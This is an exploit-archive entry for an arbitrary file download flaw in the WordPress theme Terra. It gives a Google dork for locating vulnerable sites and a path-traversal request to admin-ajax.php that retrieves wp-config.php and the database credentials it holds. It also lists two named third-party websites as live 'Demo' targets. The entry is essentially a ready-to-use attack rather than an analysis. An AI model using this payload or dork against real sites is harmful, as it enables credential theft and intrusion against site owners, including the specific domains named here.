id: 23142
date: 01/18/2015
title: Wordpress Theme Terra Arbitrary File Download Vulnerability
author: terrorist
cves: 

######################
# Exploit Title: Wordpress Theme Terra Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist - GHC (Georgian Hacking Community) team
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/terra/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

#Demo

http://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://mcity.se/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-26]  #